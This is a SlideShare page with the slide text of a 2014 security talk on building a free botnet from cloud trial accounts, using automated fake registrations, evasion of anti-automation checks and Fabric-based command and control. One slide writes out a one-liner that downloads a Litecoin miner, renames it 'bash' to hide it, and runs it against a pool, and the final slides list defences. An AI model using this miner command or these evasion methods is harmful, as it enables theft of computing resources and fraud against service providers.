SlideShare a Scribd company logo

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

Rob Ragan
Rob Ragan

What happens when computer criminals start using friendly cloud services for malicious activities? In this presentation, we explore how to (ab)use free trials to get access to vast amounts of computing power, storage, and pre-made hacking environments. Oh! Also, we violate the hell out of some terms of service. We explore just how easy it is to generate massive amounts of unique email addresses; in order to register free trial accounts, deploy code, and distribute commands (C2). We managed to build this cloud-based botnet all for the low cost of $0 and semi-legally. This botnet doesn't get flagged as malware, blocked by web filters, or get taken over. This is the stuff of nightmares! While riding on the fluffy Kumobot (kumo means cloud in Japanese), it was discovered that we were not the only ones doing this! With the rise of crypto currency we now face the impending rise of botnets that mine for digital gold on someone else's systems with someone else's dime footing the electric bill. Through our efforts in building a cloud-based botnet we built enough tools to share a framework for penetration testers and security researchers. The anti-anti-automation framework will show those tasked with defense exactly what it looks like when their free trial gets assaulted.

Technology
1 of 47
Download to read offline
CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
2 …and Violating Terms of Service Building a Botnet with Free Cloud-based Services
3 Main Topics •  Could we build a botnet from freely available cloud services? •  Will we see the rise of more cloud based botnets? •  Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
4 Platform as a Service Cloud PaaS
5 Platform as a Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/AZ4nYp
6 Development Environment as a Service Free Cloud Services
AUTOMATION Scripting the Cloud
8 Automating Registration •  Hurdles -  Email address confirmation -  CAPTCHA -  Phone/SMS -  Credit Card Usability vs Security Cloud Providers (In)Security
9 Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
10 Anti-Automation Techniques •  Email address confirmation •  CAPTCHA •  Phone/SMS •  Credit Card Usability vs Security Cloud Providers (In)Security
11
12 Automated email processing -  Wildcard localpart *@domain.com -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
local-part@domain.tld Email Address Anatomy
14 Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
15 Unlimited usernames -  Prevent pattern recognition -  Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
16 Unlimited domains -  freedns.afraid.org -  Prevent detection -  Thousands of unique email domains SMTP Services Plethora of Email Addresses
17 Unlimited email addresses Free DNS Subdomains
18 What do we need? •  Free email relay -  Free MX registration •  Process wildcards -  *@domain.tld •  Send unlimited messages -  Unrestricted STMP to HTTP POST/ JSON requests Free Signups Receiving Email and Processing
19 Inbound Mail As A Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/yqoh6U
20 Automated email processing -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
21 <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
DEMONSTRATION Automatic Account Creation
23 Automated Registration Workflow Email Addresses
24 MongoDB •  MongoLab •  MongoHQ Keeping track of all accounts Storing Account Information
FUNTIVITIES Botnets Are Fun!
26 What can we do? •  Distributed Network Scanning •  Distributed Password Cracking •  DDoS •  Click-fraud •  Crypto Currency Mining •  Data Storage Now we have a botnet! Fun! Botnet Activities
27 Refer Fake Friends Unlimited Storage Space
28 Refer Fake Friends Unlimited Storage Space
29 What are we using? •  Fabric -  Fabric is a Python library and command- line tool for streamlining the use of SSH for application deployment or systems administration tasks. •  fab check_hosts –P –z 20 •  fab run_command Botnet C2 Command & Control
30 Unique Amazon IP Addresses Distributed Command [na1.cloudbox.net:2352]: curl http://icanhazip.com 4.109.182.13 [eu1.cloudbox.net:3127]: curl http://icanhazip.com 126.34.56.254 [na1.cloudbox.net:10660]: curl http://icanhazip.com 58.251.42.128 [na1.cloudbox.net:15627]: curl http://icanhazip.com 74.216.236.72 [na1.cloudbox.net:8000]: curl http://icanhazip.com 28.228.253.19 [na1.cloudbox.net:4028]: curl http://icanhazip.com 64.216.37.252
31 Make money, money •  Deploying miners •  One command for $$$ All your processors are belong to us Litecoin Mining if [ ! -f bash ]; then wget http://sourceforge.net/projects/ cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler- cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash –url=stratum+tcp://pool.mine-litecoin.com -- userpass=ninja.47:47; rm bash
32 Load After Crypto Currency Mining Distributed Command ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
33 All your processors are belong to us Litecoin Mining
CLOUD BREAKOUT Bypassing Restrictions
DETECTION No one can catch a ninja!
36 Automatic Backups •  Propagate to other similar services -  e.g. MongoLab ß à MongoHQ •  Infrastructure across multiple service providers •  Easily migrated Armadillo Up ™ Disaster Recovery Plan
RISING TREAD Active Attacks
38 Adaptation Cloud Provider Registration
39 Adaptation Cloud Provider Registration
40 Adaptation Cloud Provider Registration
41 Crypto Coins & DDoS Clouds Under Siege
42 Crypto Coins & DDoS Clouds Under Siege
PROTECTION Bot Busters
44 What can we do? •  Logic puzzles •  Sound output •  Credit card validation •  Live operators •  Limited-use account •  Heuristic checks •  Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
45 What should we do? •  Analyzing properties of Sybil accounts •  Analyzing the arrival rate and distribution of accounts •  Flag accounts registered with emails from newly registered domain names •  Email verification •  CAPTCHAs •  IP Blacklisting •  Phone/SMS verification •  Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
46 At Abuse vs At Registration Protection Advanced techniques •  Signup flow events -  Detect common activities after signup •  User-agent -  A registration bot may generate a different user-agent for each signup or use uncommon user-agents •  Form submission timing -  A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM

Recommended

Kakao Cloud Native Platform, 9rum
Kakao Cloud Native Platform, 9rumKakao Cloud Native Platform, 9rum
Kakao Cloud Native Platform, 9rumif kakao
 
Resource Aware Scheduling in Apache Storm
Resource Aware Scheduling in Apache StormResource Aware Scheduling in Apache Storm
Resource Aware Scheduling in Apache StormDataWorks Summit/Hadoop Summit
 
Intro to Kapacitor for Alerting and Anomaly Detection
Intro to Kapacitor for Alerting and Anomaly DetectionIntro to Kapacitor for Alerting and Anomaly Detection
Intro to Kapacitor for Alerting and Anomaly DetectionInfluxData
 
Tracing Microservices with Zipkin
Tracing Microservices with ZipkinTracing Microservices with Zipkin
Tracing Microservices with Zipkintakezoe
 
채팅서버의 부하 분산 사례
채팅서버의 부하 분산 사례채팅서버의 부하 분산 사례
채팅서버의 부하 분산 사례John Kim
 
요즘 유행하는 AI 나도 해보자 (feat. CoreML)
요즘 유행하는 AI 나도 해보자 (feat. CoreML)요즘 유행하는 AI 나도 해보자 (feat. CoreML)
요즘 유행하는 AI 나도 해보자 (feat. CoreML)Chiwon Song
 
Gain Better Observability with OpenTelemetry and InfluxDB
Gain Better Observability with OpenTelemetry and InfluxDB Gain Better Observability with OpenTelemetry and InfluxDB
Gain Better Observability with OpenTelemetry and InfluxDB InfluxData
 
김민욱, (달빛조각사) 엘릭서를 이용한 mmorpg 서버 개발, NDC2019
김민욱, (달빛조각사) 엘릭서를 이용한 mmorpg 서버 개발, NDC2019김민욱, (달빛조각사) 엘릭서를 이용한 mmorpg 서버 개발, NDC2019
김민욱, (달빛조각사) 엘릭서를 이용한 mmorpg 서버 개발, NDC2019min woog kim
 

Recommended

Kakao Cloud Native Platform, 9rum
Kakao Cloud Native Platform, 9rumKakao Cloud Native Platform, 9rum
Kakao Cloud Native Platform, 9rumif kakao
 
Resource Aware Scheduling in Apache Storm
Resource Aware Scheduling in Apache StormResource Aware Scheduling in Apache Storm
Resource Aware Scheduling in Apache StormDataWorks Summit/Hadoop Summit
 
Intro to Kapacitor for Alerting and Anomaly Detection
Intro to Kapacitor for Alerting and Anomaly DetectionIntro to Kapacitor for Alerting and Anomaly Detection
Intro to Kapacitor for Alerting and Anomaly DetectionInfluxData
 
Tracing Microservices with Zipkin
Tracing Microservices with ZipkinTracing Microservices with Zipkin
Tracing Microservices with Zipkintakezoe
 
채팅서버의 부하 분산 사례
채팅서버의 부하 분산 사례채팅서버의 부하 분산 사례
채팅서버의 부하 분산 사례John Kim
 
요즘 유행하는 AI 나도 해보자 (feat. CoreML)
요즘 유행하는 AI 나도 해보자 (feat. CoreML)요즘 유행하는 AI 나도 해보자 (feat. CoreML)
요즘 유행하는 AI 나도 해보자 (feat. CoreML)Chiwon Song
 
Gain Better Observability with OpenTelemetry and InfluxDB
Gain Better Observability with OpenTelemetry and InfluxDB Gain Better Observability with OpenTelemetry and InfluxDB
Gain Better Observability with OpenTelemetry and InfluxDB InfluxData
 
김민욱, (달빛조각사) 엘릭서를 이용한 mmorpg 서버 개발, NDC2019
김민욱, (달빛조각사) 엘릭서를 이용한 mmorpg 서버 개발, NDC2019김민욱, (달빛조각사) 엘릭서를 이용한 mmorpg 서버 개발, NDC2019
김민욱, (달빛조각사) 엘릭서를 이용한 mmorpg 서버 개발, NDC2019min woog kim
 
Moving a Monolith to Kubernetes
Moving a Monolith to KubernetesMoving a Monolith to Kubernetes
Moving a Monolith to KubernetesM. Scott Ford
 
Jakarta EE 10 - Feature by Feature
Jakarta EE 10 - Feature by FeatureJakarta EE 10 - Feature by Feature
Jakarta EE 10 - Feature by FeatureIvar Grimstad
 
Deep Dive into the New Features of Apache Spark 3.1
Deep Dive into the New Features of Apache Spark 3.1Deep Dive into the New Features of Apache Spark 3.1
Deep Dive into the New Features of Apache Spark 3.1Databricks
 
Hyperledger Fabric practice (v2.0)
Hyperledger Fabric practice (v2.0) Hyperledger Fabric practice (v2.0)
Hyperledger Fabric practice (v2.0) wonyong hwang
 
셸 스크립트를 이용한 클라우드 시스템 운영
셸 스크립트를 이용한 클라우드 시스템 운영셸 스크립트를 이용한 클라우드 시스템 운영
셸 스크립트를 이용한 클라우드 시스템 운영Nalee Jang
 
Room 2 - 3 - Nguyễn Hoài Nam & Nguyễn Việt Hùng - Terraform & Pulumi Comparin...
Room 2 - 3 - Nguyễn Hoài Nam & Nguyễn Việt Hùng - Terraform & Pulumi Comparin...Room 2 - 3 - Nguyễn Hoài Nam & Nguyễn Việt Hùng - Terraform & Pulumi Comparin...
Room 2 - 3 - Nguyễn Hoài Nam & Nguyễn Việt Hùng - Terraform & Pulumi Comparin...Vietnam Open Infrastructure User Group
 
Continuous Integration & Continuous Delivery with GCP
Continuous Integration & Continuous Delivery with GCPContinuous Integration & Continuous Delivery with GCP
Continuous Integration & Continuous Delivery with GCPKAI CHU CHUNG
 
모델 서빙 파이프라인 구축하기
모델 서빙 파이프라인 구축하기모델 서빙 파이프라인 구축하기
모델 서빙 파이프라인 구축하기SeongIkKim2
 
Amazon Rekognition을 이용하여 인공지능 안면 인식 키오스크 만들기 - 강정희 (AWS 솔루션즈 아키텍트)
Amazon Rekognition을 이용하여 인공지능 안면 인식 키오스크 만들기 - 강정희 (AWS 솔루션즈 아키텍트)Amazon Rekognition을 이용하여 인공지능 안면 인식 키오스크 만들기 - 강정희 (AWS 솔루션즈 아키텍트)
Amazon Rekognition을 이용하여 인공지능 안면 인식 키오스크 만들기 - 강정희 (AWS 솔루션즈 아키텍트)Amazon Web Services Korea
 
kubernetes : From beginner to Advanced
kubernetes : From beginner to Advancedkubernetes : From beginner to Advanced
kubernetes : From beginner to AdvancedInho Kang
 
Migrating Hundreds of Legacy Applications to Kubernetes - The Good, the Bad, ...
Migrating Hundreds of Legacy Applications to Kubernetes - The Good, the Bad, ...Migrating Hundreds of Legacy Applications to Kubernetes - The Good, the Bad, ...
Migrating Hundreds of Legacy Applications to Kubernetes - The Good, the Bad, ...QAware GmbH
 
우아한 모노리스
우아한 모노리스우아한 모노리스
우아한 모노리스Arawn Park
 
Iocp 기본 구조 이해
Iocp 기본 구조 이해Iocp 기본 구조 이해
Iocp 기본 구조 이해Nam Hyeonuk
 
Infrastructure as Code with Terraform
Infrastructure as Code with TerraformInfrastructure as Code with Terraform
Infrastructure as Code with TerraformTim Berry
 
Kgc2012 온라인 게임을 위한 게임 오브젝트 설계
Kgc2012 온라인 게임을 위한 게임 오브젝트 설계Kgc2012 온라인 게임을 위한 게임 오브젝트 설계
Kgc2012 온라인 게임을 위한 게임 오브젝트 설계kgun86
 
Statistical Learning Based Anomaly Detection @ Twitter
Statistical Learning Based Anomaly Detection @ TwitterStatistical Learning Based Anomaly Detection @ Twitter
Statistical Learning Based Anomaly Detection @ TwitterArun Kejariwal
 
[NDC 2016] 유니티, iOS에서 LINQ 사용하기
[NDC 2016] 유니티, iOS에서 LINQ 사용하기[NDC 2016] 유니티, iOS에서 LINQ 사용하기
[NDC 2016] 유니티, iOS에서 LINQ 사용하기Daehee Kim
 
The Five Stages of Enterprise Jupyter Deployment
The Five Stages of Enterprise Jupyter DeploymentThe Five Stages of Enterprise Jupyter Deployment
The Five Stages of Enterprise Jupyter DeploymentFrederick Reiss
 
Alexander Naydenko - Nagios to Zabbix Migration | ZabConf2016
Alexander Naydenko - Nagios to Zabbix Migration | ZabConf2016Alexander Naydenko - Nagios to Zabbix Migration | ZabConf2016
Alexander Naydenko - Nagios to Zabbix Migration | ZabConf2016Zabbix
 
초보자를 위한 시스템 해킹 공부 가이드라인
초보자를 위한 시스템 해킹 공부 가이드라인초보자를 위한 시스템 해킹 공부 가이드라인
초보자를 위한 시스템 해킹 공부 가이드라인H4C
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Social Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansSocial Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansRob Ragan
 

More Related Content

What's hot

Moving a Monolith to Kubernetes
Moving a Monolith to KubernetesMoving a Monolith to Kubernetes
Moving a Monolith to KubernetesM. Scott Ford
 
Jakarta EE 10 - Feature by Feature
Jakarta EE 10 - Feature by FeatureJakarta EE 10 - Feature by Feature
Jakarta EE 10 - Feature by FeatureIvar Grimstad
 
Deep Dive into the New Features of Apache Spark 3.1
Deep Dive into the New Features of Apache Spark 3.1Deep Dive into the New Features of Apache Spark 3.1
Deep Dive into the New Features of Apache Spark 3.1Databricks
 
Hyperledger Fabric practice (v2.0)
Hyperledger Fabric practice (v2.0) Hyperledger Fabric practice (v2.0)
Hyperledger Fabric practice (v2.0) wonyong hwang
 
셸 스크립트를 이용한 클라우드 시스템 운영
셸 스크립트를 이용한 클라우드 시스템 운영셸 스크립트를 이용한 클라우드 시스템 운영
셸 스크립트를 이용한 클라우드 시스템 운영Nalee Jang
 
Room 2 - 3 - Nguyễn Hoài Nam & Nguyễn Việt Hùng - Terraform & Pulumi Comparin...
Room 2 - 3 - Nguyễn Hoài Nam & Nguyễn Việt Hùng - Terraform & Pulumi Comparin...Room 2 - 3 - Nguyễn Hoài Nam & Nguyễn Việt Hùng - Terraform & Pulumi Comparin...
Room 2 - 3 - Nguyễn Hoài Nam & Nguyễn Việt Hùng - Terraform & Pulumi Comparin...Vietnam Open Infrastructure User Group
 
Continuous Integration & Continuous Delivery with GCP
Continuous Integration & Continuous Delivery with GCPContinuous Integration & Continuous Delivery with GCP
Continuous Integration & Continuous Delivery with GCPKAI CHU CHUNG
 
모델 서빙 파이프라인 구축하기
모델 서빙 파이프라인 구축하기모델 서빙 파이프라인 구축하기
모델 서빙 파이프라인 구축하기SeongIkKim2
 
Amazon Rekognition을 이용하여 인공지능 안면 인식 키오스크 만들기 - 강정희 (AWS 솔루션즈 아키텍트)
Amazon Rekognition을 이용하여 인공지능 안면 인식 키오스크 만들기 - 강정희 (AWS 솔루션즈 아키텍트)Amazon Rekognition을 이용하여 인공지능 안면 인식 키오스크 만들기 - 강정희 (AWS 솔루션즈 아키텍트)
Amazon Rekognition을 이용하여 인공지능 안면 인식 키오스크 만들기 - 강정희 (AWS 솔루션즈 아키텍트)Amazon Web Services Korea
 
kubernetes : From beginner to Advanced
kubernetes : From beginner to Advancedkubernetes : From beginner to Advanced
kubernetes : From beginner to AdvancedInho Kang
 
Migrating Hundreds of Legacy Applications to Kubernetes - The Good, the Bad, ...
Migrating Hundreds of Legacy Applications to Kubernetes - The Good, the Bad, ...Migrating Hundreds of Legacy Applications to Kubernetes - The Good, the Bad, ...
Migrating Hundreds of Legacy Applications to Kubernetes - The Good, the Bad, ...QAware GmbH
 
우아한 모노리스
우아한 모노리스우아한 모노리스
우아한 모노리스Arawn Park
 
Iocp 기본 구조 이해
Iocp 기본 구조 이해Iocp 기본 구조 이해
Iocp 기본 구조 이해Nam Hyeonuk
 
Infrastructure as Code with Terraform
Infrastructure as Code with TerraformInfrastructure as Code with Terraform
Infrastructure as Code with TerraformTim Berry
 
Kgc2012 온라인 게임을 위한 게임 오브젝트 설계
Kgc2012 온라인 게임을 위한 게임 오브젝트 설계Kgc2012 온라인 게임을 위한 게임 오브젝트 설계
Kgc2012 온라인 게임을 위한 게임 오브젝트 설계kgun86
 
Statistical Learning Based Anomaly Detection @ Twitter
Statistical Learning Based Anomaly Detection @ TwitterStatistical Learning Based Anomaly Detection @ Twitter
Statistical Learning Based Anomaly Detection @ TwitterArun Kejariwal
 
[NDC 2016] 유니티, iOS에서 LINQ 사용하기
[NDC 2016] 유니티, iOS에서 LINQ 사용하기[NDC 2016] 유니티, iOS에서 LINQ 사용하기
[NDC 2016] 유니티, iOS에서 LINQ 사용하기Daehee Kim
 
The Five Stages of Enterprise Jupyter Deployment
The Five Stages of Enterprise Jupyter DeploymentThe Five Stages of Enterprise Jupyter Deployment
The Five Stages of Enterprise Jupyter DeploymentFrederick Reiss
 
Alexander Naydenko - Nagios to Zabbix Migration | ZabConf2016
Alexander Naydenko - Nagios to Zabbix Migration | ZabConf2016Alexander Naydenko - Nagios to Zabbix Migration | ZabConf2016
Alexander Naydenko - Nagios to Zabbix Migration | ZabConf2016Zabbix
 
초보자를 위한 시스템 해킹 공부 가이드라인
초보자를 위한 시스템 해킹 공부 가이드라인초보자를 위한 시스템 해킹 공부 가이드라인
초보자를 위한 시스템 해킹 공부 가이드라인H4C
 

What's hot (20)

Moving a Monolith to Kubernetes
Moving a Monolith to KubernetesMoving a Monolith to Kubernetes
Moving a Monolith to Kubernetes
 
Jakarta EE 10 - Feature by Feature
Jakarta EE 10 - Feature by FeatureJakarta EE 10 - Feature by Feature
Jakarta EE 10 - Feature by Feature
 
Deep Dive into the New Features of Apache Spark 3.1
Deep Dive into the New Features of Apache Spark 3.1Deep Dive into the New Features of Apache Spark 3.1
Deep Dive into the New Features of Apache Spark 3.1
 
Hyperledger Fabric practice (v2.0)
Hyperledger Fabric practice (v2.0) Hyperledger Fabric practice (v2.0)
Hyperledger Fabric practice (v2.0)
 
셸 스크립트를 이용한 클라우드 시스템 운영
셸 스크립트를 이용한 클라우드 시스템 운영셸 스크립트를 이용한 클라우드 시스템 운영
셸 스크립트를 이용한 클라우드 시스템 운영
 
Room 2 - 3 - Nguyễn Hoài Nam & Nguyễn Việt Hùng - Terraform & Pulumi Comparin...
Room 2 - 3 - Nguyễn Hoài Nam & Nguyễn Việt Hùng - Terraform & Pulumi Comparin...Room 2 - 3 - Nguyễn Hoài Nam & Nguyễn Việt Hùng - Terraform & Pulumi Comparin...
Room 2 - 3 - Nguyễn Hoài Nam & Nguyễn Việt Hùng - Terraform & Pulumi Comparin...
 
Continuous Integration & Continuous Delivery with GCP
Continuous Integration & Continuous Delivery with GCPContinuous Integration & Continuous Delivery with GCP
Continuous Integration & Continuous Delivery with GCP
 
모델 서빙 파이프라인 구축하기
모델 서빙 파이프라인 구축하기모델 서빙 파이프라인 구축하기
모델 서빙 파이프라인 구축하기
 
Amazon Rekognition을 이용하여 인공지능 안면 인식 키오스크 만들기 - 강정희 (AWS 솔루션즈 아키텍트)
Amazon Rekognition을 이용하여 인공지능 안면 인식 키오스크 만들기 - 강정희 (AWS 솔루션즈 아키텍트)Amazon Rekognition을 이용하여 인공지능 안면 인식 키오스크 만들기 - 강정희 (AWS 솔루션즈 아키텍트)
Amazon Rekognition을 이용하여 인공지능 안면 인식 키오스크 만들기 - 강정희 (AWS 솔루션즈 아키텍트)
 
kubernetes : From beginner to Advanced
kubernetes : From beginner to Advancedkubernetes : From beginner to Advanced
kubernetes : From beginner to Advanced
 
Migrating Hundreds of Legacy Applications to Kubernetes - The Good, the Bad, ...
Migrating Hundreds of Legacy Applications to Kubernetes - The Good, the Bad, ...Migrating Hundreds of Legacy Applications to Kubernetes - The Good, the Bad, ...
Migrating Hundreds of Legacy Applications to Kubernetes - The Good, the Bad, ...
 
우아한 모노리스
우아한 모노리스우아한 모노리스
우아한 모노리스
 
Iocp 기본 구조 이해
Iocp 기본 구조 이해Iocp 기본 구조 이해
Iocp 기본 구조 이해
 
Infrastructure as Code with Terraform
Infrastructure as Code with TerraformInfrastructure as Code with Terraform
Infrastructure as Code with Terraform
 
Kgc2012 온라인 게임을 위한 게임 오브젝트 설계
Kgc2012 온라인 게임을 위한 게임 오브젝트 설계Kgc2012 온라인 게임을 위한 게임 오브젝트 설계
Kgc2012 온라인 게임을 위한 게임 오브젝트 설계
 
Statistical Learning Based Anomaly Detection @ Twitter
Statistical Learning Based Anomaly Detection @ TwitterStatistical Learning Based Anomaly Detection @ Twitter
Statistical Learning Based Anomaly Detection @ Twitter
 
[NDC 2016] 유니티, iOS에서 LINQ 사용하기
[NDC 2016] 유니티, iOS에서 LINQ 사용하기[NDC 2016] 유니티, iOS에서 LINQ 사용하기
[NDC 2016] 유니티, iOS에서 LINQ 사용하기
 
The Five Stages of Enterprise Jupyter Deployment
The Five Stages of Enterprise Jupyter DeploymentThe Five Stages of Enterprise Jupyter Deployment
The Five Stages of Enterprise Jupyter Deployment
 
Alexander Naydenko - Nagios to Zabbix Migration | ZabConf2016
Alexander Naydenko - Nagios to Zabbix Migration | ZabConf2016Alexander Naydenko - Nagios to Zabbix Migration | ZabConf2016
Alexander Naydenko - Nagios to Zabbix Migration | ZabConf2016
 
초보자를 위한 시스템 해킹 공부 가이드라인
초보자를 위한 시스템 해킹 공부 가이드라인초보자를 위한 시스템 해킹 공부 가이드라인
초보자를 위한 시스템 해킹 공부 가이드라인
 

Viewers also liked

Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Social Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansSocial Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansRob Ragan
 
Tenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingTenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingRob Ragan
 
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Rob Ragan
 
Bitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The CommunityBitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The CommunityEarthsite
 
Blockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack LabsBlockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack LabsWithTheBest
 
Demonetisation
DemonetisationDemonetisation
DemonetisationKannan R
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskBSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskRob Ragan
 
21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks Revealed21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks RevealedEmma Brudner
 
Train The Trainer Power Point Presentation
Train The Trainer Power Point PresentationTrain The Trainer Power Point Presentation
Train The Trainer Power Point Presentationpreethi_madhan
 

Viewers also liked (15)

Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Social Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansSocial Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response Plans
 
Tenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingTenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of Bing
 
Black money
Black moneyBlack money
Black money
 
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
 
Bitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The CommunityBitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The Community
 
Blockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack LabsBlockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack Labs
 
Demonetisation
DemonetisationDemonetisation
Demonetisation
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Demonetization Myths Debunked
Demonetization Myths DebunkedDemonetization Myths Debunked
Demonetization Myths Debunked
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskBSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
 
Corruption
CorruptionCorruption
Corruption
 
Demonetisation.
Demonetisation.Demonetisation.
Demonetisation.
 
21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks Revealed21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks Revealed
 
Train The Trainer Power Point Presentation
Train The Trainer Power Point PresentationTrain The Trainer Power Point Presentation
Train The Trainer Power Point Presentation
 

Similar to CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet FarmerBlack Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet FarmerBishop Fox
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud preventionRakuten Group, Inc.
 
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys MeetupsVPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys MeetupsAngel Alberici
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsSBWebinars
 
Meetup milano #3 all you need to know before creating your vpc
